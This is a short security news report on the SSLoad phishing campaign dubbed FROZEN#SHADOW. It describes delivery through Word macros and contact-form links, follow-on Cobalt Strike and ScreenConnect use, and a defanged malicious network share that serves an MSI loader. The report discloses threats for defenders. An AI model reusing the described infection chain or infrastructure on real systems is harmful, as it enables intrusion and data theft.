Researchers Detail Multistage Attack Hijacking Systems with SSLoad

Researchers Detail Multistage Attack Hijacking Systems with SSLoad

Cybersecurity researchers have discovered an ongoing attack campaign that’s leveraging phishing emails to deliver a malware called SSLoad.

The campaign, codenamed FROZEN#SHADOW by Securonix, also involves the deployment of Cobalt Strike and the ConnectWise ScreenConnect remote desktop software.

“SSLoad is designed to stealthily infiltrate systems, gather sensitive information and transmit its findings back to its operators,” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said in a report shared with The Hacker News.

Earlier this month, Palo Alto Networks uncovered at least two different methods by which SSLoad is distributed, one which entails the use of website contact forms to embed booby-trapped URLs and another involving macro-enabled Microsoft Word documents.

The latter is also notable for the fact that the malware acts as a conduit for delivering Cobalt Strike, while the former has been used to deliver a different malware called Latrodectus, a likely successor to IcedID.

The obfuscated JavaScript file (“out_czlrh.js”), when launched and run using wscript.exe, retrieves an MSI installer file (“slack.msi”) by connecting to a network share located at “\\wireoneinternet[.]info@80\share\” and runs it using msiexec.exe.

The disclosure comes as the AhnLab Security Intelligence Center (ASEC) revealed that Linux systems are being infected with an open-source remote access trojan called Pupy RAT.